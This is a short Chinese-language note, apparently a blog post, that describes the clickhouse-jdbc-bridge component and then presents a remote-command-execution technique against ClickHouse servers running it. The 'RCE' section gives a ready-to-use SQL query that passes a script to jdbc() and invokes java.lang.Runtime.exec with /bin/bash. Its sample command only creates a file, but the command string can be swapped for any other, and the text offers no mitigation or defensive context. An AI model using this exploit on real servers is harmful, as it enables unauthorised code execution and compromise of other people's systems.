clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse?. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.
簡單來說是clickhouse服務端的一個組件 功能是用來創建新的jdbc連接
https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

當我們連接到clickhouse的時候，如果服務端支持clickhouse-jdbc-bridge
那么可以輸入以下命令RCE

SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

然后可以在服務器端/tmp目錄下看到1.txt